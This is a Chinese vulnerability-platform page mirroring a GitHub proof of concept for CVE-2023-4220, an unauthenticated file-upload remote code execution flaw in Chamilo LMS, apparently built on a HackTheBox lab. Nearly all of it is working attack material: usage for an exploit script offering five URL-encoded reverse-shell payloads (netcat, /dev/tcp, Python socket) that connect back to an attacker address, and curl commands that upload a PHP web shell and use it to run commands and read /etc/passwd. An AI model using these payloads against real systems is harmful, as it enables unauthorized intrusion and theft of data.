漏洞平台

POC详情： a13489cb200bc6ce9dcfd1dc7f39c8ba9d57968f

来源

https://github.com/nr4x4/CVE-2023-4220

关联漏洞

标题： Chamilo LMS 安全漏洞 (CVE-2023-4220)
描述：Chamilo LMS是Chamilo协会的一套开源的在线学习和协作系统。该系统支持创建教学内容、远程培训和在线答题等。 Chamilo LMS v1.11.24 版本及之前版本存在安全漏洞，该漏洞源于 “/main/inc/lib/javascript/bigupload/inc/bigUpload.php”页面存在大文件上传功能存在不受限制的文件上传。

描述

CVE-2023–4220 Exploit

介绍

<h1>CVE-2023-4220 Exploit</h1>

<h2>Chamilo LMS Unauthenticated Big Upload File Remote Code Execution</h2>

--------------------------------------------------------

<h2>Usage cve-2023-4220.sh</h2>

`./cve-2023-4220.sh <Target-URL> <Target-Port> <Local-HOST> <Local-IP> <Payload>`

`./cve-2023-4220.sh lms.test.htb 80 10.10.14.14 80 1`

```
./cve-2023-4220.sh -h                                 

Usage for RevShell: ./cve-2023-4220.sh <Target-URL> <Target-Port> <Local-HOST> <Local-IP> <Payload>

Example: ./cve-2023-4220.sh lms.test.htb 80 10.10.14.14 80 1

Payload: 1 == rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.10.10%209001%20%3E%2Ftmp%2Ff

Payload: 2 == sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.10.10%2F9001%200%3E%261

Payload: 3 == nc%2010.10.10.10%209001%20-e%20sh

Payload: 4 == python3%20-c%20%27import%20os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.10.10%22%2C9001%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for%20f%20in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22sh%22%29%27

Payload: 5 == Enter own Payload:
```
![Example](/permx033.png)

![Example](/permx028.png)

![Example](/permx030.png)

--------------------------------------------------------

<h2>Get RCE</h2>

```
echo '<?php system($_GET["jiji"]);  ?>' > jiji.php

curl -F 'bigUploadFile=@jiji.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'

curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/jiji.php?jiji=id'

curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/jiji.php?jiji=cat+/etc/passwd'
```

![Example](/permx034.png)

![Example](/permx035.png)

--------------------------------------------------------

<h2>Usage cve-2023-4220.py</h2>

![Example](/permx036.png)

--------------------------------------------------------

**Source: https://starlabs.sg/advisories/23/23-4220/**

`$ echo '<?php system("id"); ?>' > rce.php`<br>
`$ curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'`<br>
`The file has successfully been uploaded.`<br>
`$ curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'`<br>
`uid=33(www-data) gid=33(www-data) groups=33(www-data)`

文件快照


 [4.0K]  /data/pocs/a13489cb200bc6ce9dcfd1dc7f39c8ba9d57968f
├── [1.0K]  cve-2023-4220.py
├── [6.0K]  cve-2023-4220.sh
├── [ 16K]  permx028.png
├── [ 47K]  permx030.png
├── [ 28K]  permx033.png
├── [ 11K]  permx034.png
├── [ 20K]  permx035.png
├── [161K]  permx036.png
└── [2.2K]  README.md

0 directories, 9 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。